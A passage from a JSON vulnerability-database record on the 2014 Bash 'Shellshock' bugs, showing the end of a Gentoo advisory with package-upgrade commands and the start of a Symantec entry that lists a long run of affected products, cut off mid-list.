\">=app-shells/bash-3.2_p56:3.2\"\n \n\nAll Bash 4.0 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-shells/bash-4.0_p43:4.0\"\n \n\nAll Bash 4.1 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-shells/bash-4.1_p16:4.1\"\n \n\nAll Bash 4.2 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-shells/bash-4.2_p52\"", "modified": "2014-10-04T00:00:00", "published": "2014-10-04T00:00:00", "id": "GLSA-201410-01", "href": "https://security.gentoo.org/glsa/201410-01", "type": "gentoo", "title": "Bash: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "symantec": [{"lastseen": "2018-03-12T10:28:36", "bulletinFamily": "software", "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "description": "### Description\n\nGNU Bash is prone to remote code execution vulnerability. An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.\n\n### Technologies Affected\n\n * Advantech EKI-1320 1.98 \n * Advantech EKI-1320 \n * Alcatel-Lucent QIP \n * Apple Mac OS X 10.0.0 3 \n * Apple Mac OS X 10.0.0 \n * Apple Mac OS X 10.0.1 \n * Apple Mac OS X 10.0.2 \n * Apple Mac OS X 10.0.3 \n * Apple Mac OS X 10.0.4 \n * Apple Mac OS X 10.1.0 \n * Apple Mac OS X 10.1.1 \n * Apple Mac OS X 10.1.2 \n * Apple Mac OS X 10.1.3 \n * Apple Mac OS X 10.1.4 \n * Apple Mac OS X 10.1.5 \n * Apple Mac OS X 10.2.0 \n * Apple Mac OS X 10.2.1 \n * Apple Mac OS X 10.2.2 \n * Apple Mac OS X 10.2.3 \n * Apple Mac OS X 10.2.4 \n * Apple Mac OS X 10.2.5 \n * Apple Mac OS X 10.2.6 \n * Apple Mac OS X 10.2.7 \n * Apple Mac OS X 10.2.8 \n * Apple Mac OS X 10.3.0 \n * Apple Mac OS X 10.3.1 \n * Apple Mac OS X 10.3.2 \n * Apple Mac OS X 10.3.3 \n * Apple Mac OS X 10.3.4 \n * Apple Mac OS X 10.3.5 \n * Apple Mac OS X 10.3.6 \n * Apple Mac OS X 10.3.7 \n * Apple Mac OS X 10.3.8 \n * Apple Mac OS X 10.3.9 \n * Apple Mac OS X 10.4.0 \n * Apple Mac OS X 10.4.1 \n * Apple Mac OS X 10.4.10 \n * Apple Mac OS X 10.4.11 \n * Apple Mac OS X 10.4.2 \n * Apple Mac OS X 10.4.3 \n * Apple Mac OS X 10.4.4 \n * Apple Mac OS X 10.4.5 \n * Apple Mac OS X 10.4.6 \n * Apple Mac OS X 10.4.7 \n * Apple Mac OS X 10.4.8 \n * Apple Mac OS X 10.4.9 \n * Apple Mac OS X 10.5 \n * Apple Mac OS X 10.5.0 \n * Apple Mac OS X 10.5.1 \n * Apple Mac OS X 10.5.2 \n * Apple Mac OS X 10.5.3 \n * Apple Mac OS X 10.5.4 \n * Apple Mac OS X 10.5.5 \n * Apple Mac OS X 10.5.6 \n * Apple Mac OS X 10.5.7 \n * Apple Mac OS X 10.5.8 \n * Apple Mac OS X 10.6 \n * Apple Mac OS X 10.6 Update 12 \n * Apple Mac OS X 10.6 Update 14 \n * Apple Mac OS X 10.6 Update 17 \n * Apple Mac OS X 10.6.1 \n * Apple Mac OS X 10.6.2 \n * Apple Mac OS X 10.6.3 \n * Apple Mac OS X 10.6.4 \n * Apple Mac OS X 10.6.5 \n * Apple Mac OS X 10.6.6 \n * Apple Mac OS X 10.6.7 \n * Apple Mac OS X 10.6.8 \n * Apple Mac OS X 10.7 \n * Apple Mac OS X 10.7.0 \n * Apple Mac OS X 10.7.1 \n * Apple Mac OS X 10.7.2 \n * Apple Mac OS X 10.7.3 \n * Apple Mac OS X 10.7.4 \n * Apple Mac OS X 10.7.5 \n * Apple Mac OS X 10.8 \n * Apple Mac OS X 10.8.0 \n * Apple Mac OS X 10.8.1 \n * Apple Mac OS X 10.8.2 \n * Apple Mac OS X 10.8.3 \n * Apple Mac OS X 10.8.4 \n * Apple Mac OS X 10.8.5 \n * Apple Mac OS X 10.8.5 Supplemental Update \n * Apple Mac OS X 10.9 \n * Apple Mac OS X 10.9.1 \n * Apple Mac OS X 10.9.2 \n * Apple Mac OS X 10.9.3 \n * Apple Mac OS X 10.9.4 \n * Apple Mac OS X 10.9.5 \n * Apple Mac OS X Server 10.7.5 \n * Appneta Pathview \n * Arista Networks EOS 4.14 \n * Arista Networks EOS 4.9 \n * Avaya 96x1 IP Deskphone 6 \n * Avaya 96x1 IP Deskphone 6.2 \n * Avaya 96x1 IP Deskphone 6.3 \n * Avaya 96x1 IP Deskphones 6.0 \n * Avaya 96x1 IP Deskphones 6.2 \n * Avaya ADS virtual app 2.0 \n * Avaya Aura Application Enablement Services 5.0 \n * Avaya Aura Application Enablement Services 5.2 \n * Avaya Aura Application Enablement Services 5.2.1 \n * Avaya Aura Application Enablement Services 5.2.2 \n * Avaya Aura Application Enablement Services 5.2.3 \n * Avaya Aura Application Enablement Services 5.2.4 \n * Avaya Aura Application Enablement Services 6.0 \n * Avaya Aura Application Enablement Services 6.1 \n * Avaya Aura Application Enablement Services 6.1.1 \n * Avaya Aura Application Enablement Services 6.1.2 \n * Avaya Aura Application Enablement Services 6.2 \n * Avaya Aura Application Enablement Services 6.3 \n * Avaya Aura Application Server 5300 SIP Core 2.0 \n * Avaya Aura Application Server 5300 SIP Core 2.0 PB16 \n * Avaya Aura Application Server 5300 SIP Core 2.0 PB19 \n * Avaya Aura Application Server 5300 SIP Core 2.0 PB23 \n * Avaya Aura Application Server 5300 SIP Core 2.0 PB25 \n * Avaya Aura Application Server 5300 SIP Core 2.0 PB26 \n * Avaya Aura Application Server 5300 SIP Core 2.0 PB28 \n * Avaya Aura Application Server 5300 SIP Core 2.1 \n * Avaya Aura Application Server 5300 SIP Core 3.0 \n * Avaya Aura Application Server 5300 SIP Core 3.0 PB3 \n * Avaya Aura Application Server 5300 SIP Core 3.0 PB5 \n * Avaya Aura Collaboration Environment 2.0 \n * Avaya Aura Collaboration Environment 3.0 \n * Avaya Aura Communication Manager 4.0 \n * Avaya Aura Communication Manager 4.0 \n * Avaya Aura Communication Manager 5.1 \n * Avaya Aura Communication Manager 5.2 \n * Avaya Aura Communication Manager 5.2.0 \n * Avaya Aura Communication Manager 5.2.1 \n * Avaya Aura Communication Manager 5.2.1 SP2 \n * Avaya Aura Communication Manager 5.2.1 SP4 \n * Avaya Aura Communication Manager 5.2.1 SP5 \n * Avaya Aura Communication Manager 5.2.1 SSP1 \n * Avaya Aura Communication Manager 5.2.1 SSP2 \n * Avaya Aura Communication Manager 5.2.1 SSP3 \n * Avaya Aura Communication Manager 6.0 \n * Avaya Aura Communication Manager 6.0.1 \n * Avaya Aura Communication Manager 6.2 \n * Avaya Aura Communication Manager 6.3 \n * Avaya Aura Communication Manager Utility Services 6.0 \n * Avaya Aura Communication Manager Utility Services 6.1 \n * Avaya Aura Communication Manager Utility Services 6.1 SP 6.1.0.9.8 \n * Avaya Aura Communication Manager Utility Services 6.1.0.9.8 \n * Avaya Aura Communication Manager Utility Services 6.2 \n * Avaya Aura Communication Manager Utility Services 6.2.4.0.15 \n * Avaya Aura Communication Manager Utility Services 6.2.5.0.15 \n * Avaya Aura Communication Manager Utility Services 6.3 \n * Avaya Aura Conferencing 7.0 \n * Avaya Aura Conferencing 7.0 Standard \n * Avaya Aura Conferencing 7.2 \n * Avaya Aura Conferencing 8.0 \n * Avaya Aura Conferencing Standard Edition 6.0 \n * Avaya Aura Experience Portal 6.0 \n * Avaya Aura Experience Portal 6.0 SP1 \n * Avaya Aura Experience Portal 6.0 SP2 \n * Avaya Aura Experience Portal 6.0.1 \n * Avaya Aura Experience Portal 6.0.2 \n * Avaya Aura Experience Portal 7.0 \n * Avaya Aura Messaging 6.0 \n * Avaya Aura Messaging 6.0.1 \n * Avaya Aura Messaging 6.1 \n * Avaya Aura Messaging 6.1.1 \n * Avaya Aura Messaging 6.2 \n * Avaya Aura Presence Services 6.0 \n * Avaya Aura Presence Services 6.1 \n * Avaya Aura Presence Services 6.1 SP1 \n * Avaya Aura Presence Services 6.1.1 \n * Avaya Aura Presence Services 6.1.2 \n * Avaya Aura Session Manager 5.2 \n * Avaya Aura Session Manager 5.2 SP1 \n * Avaya Aura Session Manager 5.2 SP2 \n * Avaya Aura Session Manager 5.2.1 \n * Avaya Aura Session Manager 6.0 \n * Avaya Aura Session Manager 6.0 SP1 \n * Avaya Aura Session Manager 6.0.1 \n * Avaya Aura Session Manager 6.1 \n * Avaya Aura Session Manager 6.1 SP1 \n * Avaya Aura Session Manager 6.1 SP2 \n * Avaya Aura Session Manager 6.1.1 \n * Avaya Aura Session Manager 6.1.2 \n * Avaya Aura Session Manager 6.1.3 \n * Avaya Aura Session Manager 6.1.5 \n * Avaya Aura Session Manager 6.2 \n * Avaya Aura Session Manager 6.2 SP1 \n * Avaya Aura Session Manager 6.2.1 \n * Avaya Aura Session Manager 6.2.2 \n * Avaya Aura Session Manager 6.3 \n * Avaya Aura System Manager 5.2 \n * Avaya Aura System Manager 6.0 \n * Avaya Aura System Manager 6.0 SP1 \n * Avaya Aura System Manager 6.1 \n * Avaya Aura System Manager 6.1 SP1 \n * Avaya Aura System Manager 6.1 SP2 \n * Avaya Aura System Manager 6.1.1 \n * Avaya Aura System Manager 6.1.2 \n * Avaya Aura System Manager 6.1.3 \n * Avaya Aura System Manager 6.1.5 \n * Avaya Aura System Manager 6.2 \n * Avaya Aura System Manager 6.2 SP3 \n * Avaya Aura System Manager 6.3 \n * Avaya Aura System Platform 1.0 \n * Avaya Aura System Platform 1.1 \n * Avaya Aura System Platform 6.0 \n * Avaya Aura System Platform 6.0 SP2 \n * Avaya Aura System Platform 6.0 SP3 \n * Avaya Aura System Platform 6.0.1 \n * Avaya Aura System Platform 6.0.2 \n * Avaya Aura System Platform 6.0.3.0.3 \n * Avaya Aura System Platform 6.0.3.8.3 \n * Avaya Aura System Platform 6.0.3.9.3 \n * Avaya Aura System Platform 6.2 \n * Avaya Aura System Platform 6.2 SP1 \n * Avaya Aura System Platform 6.2.1 \n * Avaya Aura System Platform 6.2.1.0.9 \n * Avaya Aura System Platform 6.3 \n * Avaya B189 IP Conference Phone 1.0 \n * Avaya B189 IP Conference Phone 1.0.0.22 \n * Avaya B189 IP Conference Phone 1.0.0.23 \n * Avaya CMS r17 \n * Avaya Collaboration Pod on VMware vCenter Server Appliance 2.0 \n * Avaya Communication Server 1000E 6.0 \n * Avaya Communication Server 1000E 7.0 \n * Avaya Communication Server 1000E 7.5 \n * Avaya Communication Server 1000E 7.6 \n * Avaya Communication Server 1000E Signaling Server 6.0 \n * Avaya Communication Server 1000E Signaling Server 7.0 \n * Avaya Communication Server 1000E Signaling Server 7.5 \n * Avaya Communication Server 1000E Signaling Server 7.6 \n * Avaya Communication Server 1000M 6.0 \n * Avaya Communication Server 1000M 7.0 \n * Avaya Communication Server 1000M 7.5 \n * Avaya Communication Server 1000M 7.6 \n * Avaya Communication Server 1000M Signaling Server 6.0 \n * Avaya Communication Server 1000M Signaling Server 7.0 \n * Avaya Communication Server 1000M Signaling Server 7.5 \n * Avaya Communication Server 1000M Signaling Server 7.6 \n * Avaya Configuration and Orchestration Manager \n * Avaya Configuration and Orchestration Manager COM 3.1 \n * Avaya Configuration and Orchestration Manager VPS 1.1 \n * Avaya Diagnostic Server 1.0 \n * Avaya Element Management System 6.0 \n * Avaya IP Flow Manager \n * Avaya IP Office Application Server 8.0 \n * Avaya IP Office Application Server 8.1 \n * Avaya IP Office Application Server 9.0 \n * Avaya IP Office Application Server 9.0 SP 1 \n * Avaya IP Office Application Server 9.0 SP 2 \n * Avaya IP Office Server Edition 8.0 \n * Avaya IP Office Server Edition 8.1 \n * Avaya IP Office Server Edition 9.0 \n * Avaya IQ 4.0 \n * Avaya IQ 4.1.0 \n * Avaya IQ 4.2 \n * Avaya IQ 5 \n * Avaya IQ 5.1 \n * Avaya IQ 5.1.1 \n * Avaya IQ 5.2 \n * Avaya Identity Engines Ignition Server 9.0.2 SP \n * Avaya Meeting Exchange 5.0 \n * Avaya Meeting Exchange 6.0 \n * Avaya Meeting Exchange 6.2 \n * Avaya Message Networking 5.2 \n * Avaya Message Networking 5.2 SP1 \n * Avaya Message Networking 5.2 SP3 \n * Avaya Message Networking 5.2 SP4 \n * Avaya Message Networking 5.2.1 \n * Avaya Message Networking 5.2.2 \n * Avaya Message Networking 5.2.3 \n * Avaya Message Networking 5.2.4 \n * Avaya Message Networking 5.2.5 \n * Avaya Message Networking 6.2.0 \n * Avaya Messaging Application Server 5.2 \n * Avaya Messaging Application Server 5.2.1 \n * Avaya Messaging Message Storage Server 5 \n * Avaya Messaging Message Storage Server 5.2.1 \n * Avaya Pod Orchestration Suite 1.0 \n * Avaya Pod Orchestration Suite 1.0.1 \n * Avaya Pod Orchestration Suite 2.0 \n * Avaya Proactive Contact 5.0 \n * Avaya Proactive Contact 5.1 \n * Avaya SAL GW virtual app 1.0 \n * Avaya Secure Access Core Concentrator 5.0 \n * Avaya Secure Access Core Concentrator 6.0 \n * Avaya Secure Access Link 1.5 \n * Avaya Secure Access Link 1.8 \n * Avaya Secure Access Link 2.0 \n * Avaya Secure Access Link GAS 5.0 \n * Avaya Secure Access Link GAS 6.0 \n * Avaya Secure Access Link Policy Server 1.5 \n * Avaya Secure Access Remote Access Concentrator 5.0 \n * Avaya Secure Access Remote Access Concentrator 6.0 \n * Avaya Services VM 1.0 \n * Avaya Services VM 2.0 \n * Avaya VPN Gateway 3050 \n * Avaya VPN Gateway 3070 \n * Avaya VPN Gateway 3090 \n * Avaya Virtualization Provisioning Service 1.1 \n * Avaya Visualization Fault and Performance Manager \n * Avaya Wireless LAN 9100 WOS with AOS 7.0.5 \n * Avaya one-X Client Enablement Services 6.1 \n * Avaya one-X Client Enablement Services 6.1.1 \n * Avaya one-X Client Enablement Services 6.1.2 \n * Avaya one-X Client Enablement Services 6.2 \n * Brocade Fibre Channel switches \n * CentOS CentOS 5 \n * Checkpoint Gaia Embedded NGX R65 \n * Checkpoint Gaia Embedded R70 \n * Checkpoint Gaia Embedded R70.1 \n * Checkpoint Gaia Embedded R70.20 \n * Checkpoint Gaia Embedded R70.30 \n * Checkpoint Gaia Embedded R70.40 \n * Checkpoint Gaia Embedded R70.50 \n * Checkpoint Gaia Embedded R71 \n * Checkpoint Gaia Embedded R71.10 \n * Checkpoint Gaia Embedded R71.20 \n * Checkpoint Gaia Embedded R71.30 \n * Checkpoint Gaia Embedded R71.40 \n * Checkpoint Gaia Embedded R71.45 \n * Checkpoint Gaia Embedded R71.50 \n * Checkpoint Gaia Embedded R75 \n * Checkpoint Gaia Embedded R75.10 \n * Checkpoint Gaia Embedded R75.20 \n * Checkpoint Gaia Embedded R75.30 \n * Checkpoint Gaia Embedded R75.40 \n * Checkpoint Gaia Embedded R75.40VS \n * Checkpoint Gaia Embedded R75.45 \n * Checkpoint Gaia Embedded R75.46 \n * Checkpoint Gaia Embedded R75.47 \n * Checkpoint Gaia Embedded R76 \n * Checkpoint Gaia Embedded R77 \n * Checkpoint Gaia Embedded R77.10 \n * Checkpoint Gaia Embedded R77.20 \n * Checkpoint Gaia NGX R65 \n * Checkpoint Gaia Os R75.0 \n * Checkpoint Gaia Os R76.0 \n * Checkpoint Gaia R70 \n * Checkpoint Gaia R70.1 \n * Checkpoint Gaia R70.20 \n * Checkpoint Gaia R70.30 \n * Checkpoint Gaia R70.40 \n * Checkpoint Gaia R70.50 \n * Checkpoint Gaia R71 \n * Checkpoint Gaia R71.10 \n * Checkpoint Gaia R71.20 \n * Checkpoint Gaia R71.30 \n * Checkpoint Gaia R71.40 \n * Checkpoint Gaia R71.45 \n * Checkpoint Gaia R71.50 \n * Checkpoint Gaia R75 \n * Checkpoint Gaia R75.10 \n * Checkpoint Gaia R75.20 \n * Checkpoint Gaia R75.30 \n * Checkpoint Gaia R75.40VS \n * Checkpoint Gaia R75.45 \n * Checkpoint Gaia R75.46 \n * Checkpoint Gaia R75.47 \n * Checkpoint Gaia R76 \n * Checkpoint Gaia R77 \n * Checkpoint Gaia R77.10 \n * Checkpoint Gaia R77.20 \n * Checkpoint IPSO 6.2 NGX R65 \n * Checkpoint IPSO 6.2 R70 \n * Checkpoint IPSO 6.2 R70.1 \n * Checkpoint IPSO 6.2 R70.20 \n * Checkpoint IPSO 6.2 R70.30 \n * Checkpoint IPSO 6.2 R70.40 \n * Checkpoint IPSO 6.2 R70.50 \n * Checkpoint IPSO 6.2 R71 \n * Checkpoint IPSO 6.2 R71.10 \n * Checkpoint IPSO 6.2 R71.20 \n * Checkpoint IPSO 6.2 R71.30 \n * Checkpoint IPSO 6.2 R71.40 \n * Checkpoint IPSO 6.2 R71.45 \n * Checkpoint IPSO 6.2 R71.50 \n * Checkpoint IPSO 6.2 R75 \n * Checkpoint IPSO 6.2 R75.10 \n * Checkpoint IPSO 6.2 R75.20 \n * Checkpoint IPSO 6.2 R75.30 \n * Checkpoint IPSO 6.2 R75.40 \n * Checkpoint IPSO 6.2 R75.40VS \n * Checkpoint IPSO 6.2 R75.45 \n * Checkpoint IPSO 6.2 R75.46 \n * Checkpoint IPSO 6.2 R75.47 \n * Checkpoint IPSO 6.2 R76 \n * Checkpoint IPSO 6.2 R77 \n * Checkpoint IPSO 6.2 R77.10 \n * Checkpoint IPSO 6.2 R77.20 \n * Checkpoint SecurePlatform 2.6 NGX R65 \n * Checkpoint SecurePlatform 2.6 R70 \n * Checkpoint SecurePlatform 2.6 R70.1 \n * Checkpoint SecurePlatform 2.6 R70.20 \n * Checkpoint SecurePlatform 2.6 R70.30 \n * Checkpoint SecurePlatform 2.6 R70.40 \n * Checkpoint SecurePlatform 2.6 R70.50 \n * Checkpoint SecurePlatform 2.6 R71 \n * Checkpoint SecurePlatform 2.6 R71.10 \n * Checkpoint SecurePlatform 2.6 R71.20 \n * Checkpoint SecurePlatform 2.6 R71.30 \n * Checkpoint SecurePlatform 2.6 R71.40 \n * Checkpoint SecurePlatform 2.6 R71.45 \n * Checkpoint SecurePlatform 2.6 R71.50 \n * Checkpoint SecurePlatform 2.6 R75 \n * Checkpoint SecurePlatform 2.6 R75.10 \n * Checkpoint SecurePlatform 2.6 R75.20 \n * Checkpoint SecurePlatform 2.6 R75.30 \n * Checkpoint SecurePlatform 2.6 R75.40 \n * Checkpoint SecurePlatform 2.6 R75.40VS \n * Checkpoint SecurePlatform 2.6 R75.45 \n * Checkpoint SecurePlatform 2.6 R75.46 \n * Checkpoint SecurePlatform 2.6 R75.47 \n * Checkpoint SecurePlatform 2.6 R76 \n * Checkpoint SecurePlatform 2.6 R77 \n * Checkpoint SecurePlatform 2.6 R77.10 \n * Checkpoint SecurePlatform 2.6 R77.20 \n * Checkpoint SecurePlatform NGX R65 \n * Checkpoint SecurePlatform R70 \n * Checkpoint SecurePlatform R70.1 \n * Checkpoint SecurePlatform R70.20 \n * Checkpoint SecurePlatform R70.30 \n * Checkpoint SecurePlatform R70.50 \n * Checkpoint SecurePlatform R71 \n * Checkpoint SecurePlatform R71.10 \n * Checkpoint SecurePlatform R71.20 \n * Checkpoint SecurePlatform R71.40 \n * Checkpoint SecurePlatform R71.45 \n * Checkpoint SecurePlatform R71.50 \n * Checkpoint SecurePlatform R75.10 \n * Checkpoint SecurePlatform R75.20 \n * Checkpoint SecurePlatform R75.30 \n * Checkpoint SecurePlatform R75.40 \n * Checkpoint SecurePlatform R75.40VS \n * Checkpoint SecurePlatform R75.45 \n * Checkpoint SecurePlatform R75.46 \n * Checkpoint SecurePlatform R75.47 \n * Checkpoint SecurePlatform R76 \n * Checkpoint SecurePlatform R77 \n * Checkpoint SecurePlatform R77.10 \n * Checkpoint SecurePlatform R77.20 \n * Cisco ACE Application Control Engine Module for the Cisco Catalyst 6500 \n * Cisco ASA CX and Cisco Prime Security Manager \n * Cisco ASR 1000 Series Routers \n * Cisco ASR 5000 Series \n * Cisco Access Registrar Appliance Cisco Prime Access Registrar Applianc \n * Cisco Application and Content Networking System (ACNS) \n * Cisco AutoBackup Server \n * Cisco Business Edition 3000 \n * Cisco Catalyst 6500 \n * Cisco Cisco ASA CX \n * Cisco Cisco Application Control Engine ACE 4710 \n * Cisco Cisco Application Control Engine ACE30 \n * Cisco Cisco Application Policy Infrastructure Controller \n * Cisco Cisco Clean Access Manager \n * Cisco Cisco Cloud Services \n * Cisco Cisco Edge 300 Digital Media Player \n * Cisco Cisco Intrusion Prevention System Solutions (IPS) \n * Cisco Cisco IronPort Encryption Appliance (IEA) \n * Cisco Cisco Life Cycle Management (LCM) \n * Cisco Cisco NAC Server \n * Cisco Cisco NetAuthenticate \n * Cisco Cisco Network Convergence System 6000 Series Routers 5.0.0 \n * Cisco Cisco Nexus 1000V InterCloud for VMware \n * Cisco Cisco Nexus 9000 \n * Cisco Cisco Nexus 9K \n * Cisco Cisco Show and Share 5(2) \n * Cisco Cisco Smart Care \n * Cisco Cisco TelePresence Video Communication Server Expressway \n * Cisco Cisco Telepresence endpoints 10\" touch panel \n * Cisco Cisco Telepresence endpoints C series \n * Cisco Cisco Telepresence endpoints EX series \n * Cisco Cisco Telepresence endpoints MX series \n * Cisco Cisco Telepresence endpoints MXG2 series \n * Cisco Cisco Telepresence endpoints SX series \n * Cisco Cisco UCS B-Series (Blade) Servers \n * Cisco Cisco UCS Central \n * Cisco Cisco Unified Computing System B-Series (Blade) Servers \n * Cisco Cisco Virtual PGW 2200 Softswitch \n * Cisco Cisco WebEx Node \n * Cisco D9036 Modular Encoding Platform \n * Cisco DC Health Check \n * Cisco Data Center Analytics Framework (DCAF) \n * Cisco Digital Media Manager (DMM) 5.0 \n * Cisco Digital Media Manager (DMM) \n * Cisco Digital Media Players \n * Cisco Download Server (DLS) (RH Based) \n * Cisco Edge 300 Digital Media Player \n * Cisco Edge 340 Digital Media Player \n * Cisco Emergency Responder 1.1.0 \n * Cisco Enterprise Content Delivery Service \n * Cisco Fibre Channel switches \n * Cisco Finesse \n * Cisco GSS 4492R Global Site Selector \n * Cisco Hosted Collaboration Mediation Fulfillment (HCM-F) \n * Cisco IM and Presence Service (CUPS) \n * Cisco IOS 15.4(1)S \n * Cisco IOS 15.4S \n * Cisco IOS \n * Cisco IOS-XE for ASR1k \n * Cisco IOS-XE for ASR903 \n * Cisco IOS-XE for CSR1000v \n * Cisco IOS-XE for Catalyst 3k \n * Cisco IOS-XE for Catalyst 4k \n * Cisco IOS-XE for Catalyst AIR-CT5760 \n * Cisco IOS-XE for ISR4400 \n * Cisco IOS-XR \n * Cisco IP Interoperability and Collaboration System (IPICS) \n * Cisco Identity Services Engine (ISE) \n * Cisco Identity Services Engine \n * Cisco Intelligent Automation for Cloud \n * Cisco Local Collector Appliance (LCA) \n * Cisco MDS 9000 \n * Cisco MDS \n * Cisco MXE Series \n * Cisco Media Experience Engine (MXE) \n * Cisco Media Experience Engines (MXE) \n * Cisco MediaSense \n * Cisco NAC Appliance \n * Cisco Nac Guest Server \n * Cisco NetFlow Collection Agent \n * Cisco Network Analysis Module \n * Cisco Network Configuration and Change Management \n * Cisco Network Convergence System (NCS) 6000 \n * Cisco Network Performance Analytics (NPA) \n * Cisco Nexus 1000 Virtual Supervisor Module (VSM) \n * Cisco Nexus 1000V \n * Cisco Nexus 1000V Switch for Nexus 3000 Series 5.0(3)U1(1) \n * Cisco Nexus 1000V Switch for Nexus 4000 Series 4.1(2)E1(1) \n * Cisco Nexus 1000V Switch for Nexus 5000 Series 4.0(0)N1(1a) \n * Cisco Nexus 1000V Switch for Nexus 7000 Series 4.1.(2) \n * Cisco Nexus 1010 \n * Cisco Nexus 3000 \n * Cisco Nexus 4000 \n * Cisco Nexus 5000 \n * Cisco Nexus 6000 \n * Cisco Nexus 7000 \n * Cisco Nexus 7000 Series Switches \n * Cisco Nexus 9000 running NxOS \n * Cisco OnePK All-in-One VM \n * Cisco Paging Server (Informacast) \n * Cisco Paging Server \n * Cisco Physical Access Gateway \n * Cisco Physical Access Manager \n * Cisco PowerVu D9190 Conditional Access Manager (PCAM) \n * Cisco Prime Collaboration Assurance \n * Cisco Prime Collaboration Deployment \n * Cisco Prime Collaboration Provisioning \n * Cisco Prime IP Express \n * Cisco Prime Infrastructure - \n * Cisco Prime Infrastructure 1.2.1 \n * Cisco Prime LAN Management Solution \n * Cisco Prime License Manager \n * Cisco Prime Network Services Controller (PNSC) \n * Cisco Prime Service Catalog Virtual Appliance \n * Cisco Proactive Network Operations Center \n * Cisco Quantum SON Suite \n * Cisco Quantum Virtualized Packet Core \n * Cisco Secure Access Control Server (ACS) \n * Cisco Secure Access Control Server \n * Cisco Service Control Engine 1010 \n * Cisco Service Control Engine 8000 \n * Cisco Services Provisioning Platform (SPP) \n * Cisco Show and Share (SnS) \n * Cisco SocialMiner \n * Cisco Standalone rack server CIMC \n * Cisco Tandberg Codian ISDN GW 3210 \n * Cisco Tandberg Codian ISDN GW 3220 \n * Cisco Tandberg Codian ISDN GW 3240 \n * Cisco Tandberg Codian MSE 8320 model \n * Cisco TelePresence 1310 \n * Cisco TelePresence Conductor \n * Cisco TelePresence Exchange System (CTX) \n * Cisco TelePresence IP Gateway Series \n * Cisco TelePresence IP VCR Series \n * Cisco TelePresence ISDN GW 3241 \n * Cisco TelePresence ISDN GW MSE 8321 \n * Cisco TelePresence ISDN Link \n * Cisco TelePresence Manager (CTSMan) \n * Cisco TelePresence Multipoint Switch \n * Cisco TelePresence Recording Server (CTRS) \n * Cisco TelePresence System 1000 \n * Cisco TelePresence System 1100 \n * Cisco TelePresence System 1300 \n * Cisco TelePresence System 3000 Series \n * Cisco TelePresence System 500-32 \n * Cisco TelePresence System 500-37 \n * Cisco TelePresence TE Software (for E20 - EoL) \n * Cisco TelePresence TE Software \n * Cisco TelePresence TX 9000 Series \n * Cisco TelePresence Video Communication Server (VCS) \n * Cisco TelePresence Video Communication Server (VCS/Expressway) \n * Cisco UCS Director \n * Cisco UCS Invicta Appliance \n * Cisco USC Invicta Series Autosupport Portal \n * Cisco Unified Communications Domain Manager \n * Cisco Unified Communications Manager (CUCM) \n * Cisco Unified Communications Manager (UCM) \n * Cisco Unified Communications Manager Session Management Edition (SME) \n * Cisco Unified Computing System (UCS) \n * Cisco Unified Contact Center Express (UCCX) \n * Cisco Unified Contact Center Express \n * Cisco Unified IP Phone \n * Cisco Unified Intelligence Center (CUIC) \n * Cisco Unified Intelligence Center \n * Cisco Unified Presence Server \n * Cisco Unity Connection (UC) \n * Cisco Unity Connection \n * Cisco Universal Small Cell CloudBase \n * Cisco VDS Service Broker \n * Cisco Video Distribution Suite for Internet Streaming VDS-IS \n * Cisco Video Surveillance Media Server \n * Cisco Videoscape Conductor \n * Cisco Videoscape Distribution Suite Transparent Caching \n * Cisco Virtual Security Gateway for Microsoft Hyper-V \n * Cisco Virtualization Experience Client 6215 \n * Cisco Visual Quality Experience Server \n * Cisco Visual Quality Experience Tools Server \n * Cisco Web Element Manager \n * Cisco WebEx Meetings Server (CWMS) \n * Cisco WebEx PCNow \n * Cisco Wide Area Application Services (WAAS) \n * Cisco Wireless Lan Controller (WLC) \n * Computer Associates API Management \n * Computer Associates Application Performance Management \n * Computer Associates Application Performance Management Cloud Monitor \n * Computer Associates Customer Experience Manager (CEM) Transaction Impact Monitor \n * Computer Associates Layer 7 API Gateway \n * Computer Associates Layer 7 API Management Portal \n * Computer Associates Layer 7 Mobile Access Gateway \n * Computer Associates User Activity Reporting Module (Enterprise Log Manager) \n * Debian Linux 6.0 amd64 \n * Debian Linux 6.0 arm \n * Debian Linux 6.0 ia-32 \n * Debian Linux 6.0 ia-64 \n * Debian Linux 6.0 mips \n * Debian Linux 6.0 powerpc \n * Debian Linux 6.0 s/390 \n * Debian Linux 6.0 sparc \n * Digi ConnectPort LTS \n * Digi Digi CM \n * Digi Digi Passport \n * EMC Avamar 4.1 \n * EMC Avamar 4.1.0-1470 \n * EMC Avamar 4.1.1 \n * EMC Avamar 4.1.1-340 \n * EMC Avamar 4.1.2 \n * EMC Avamar 4.1.2-33 \n * EMC Avamar 5.0 \n * EMC Avamar 5.0 SP1 \n * EMC Avamar 5.0 SP2 \n * EMC Avamar 5.0.0-407 \n * EMC Avamar 5.0.1 \n * EMC Avamar 5.0.1-32 \n * EMC Avamar 5.0.2 \n * EMC Avamar 5.0.2-41 \n * EMC Avamar 5.0.3 \n * EMC Avamar 5.0.3-29 \n * EMC Avamar 5.0.4 \n * EMC Avamar 5.0.4-26 \n * EMC Avamar 6.0 \n * EMC Avamar 6.0.1 \n * EMC Avamar 6.0.2 \n * EMC Avamar 6.0.3 \n * EMC Avamar 6.1 \n * EMC Avamar 6.1.1 \n * EMC Avamar 6.1.1-87 \n * EMC Avamar 6.1.100-333 \n * EMC Avamar 6.1.100-402 \n * EMC Avamar 6.1.101-89 \n * EMC Avamar Server 5.0 \n * EMC Avamar Server 6.0 \n * EMC Avamar Server 7.0 \n * EMC Celerra \n * EMC Isilon OneFS \n * EMC Kazeon 4.7 \n * EMC Kazeon 4.8 \n * EMC Supplier Exchange \n * EMC VNX1 \n * EMC VNX2 \n * EMC VNXe 3200 \n * EMC VNXe \n * EMC VPLEX \n * EMC VPLEX-VE \n * F5 ARX 6.0.0 \n * F5 ARX 6.1.0 \n * F5 ARX 6.1.1 \n * F5 ARX 6.2.0 \n * F5 ARX 6.3.0 \n * F5 ARX 6.4.0 \n * F5 BIG-IP AAM 11.4.0 \n * F5 BIG-IP AAM 11.4.1 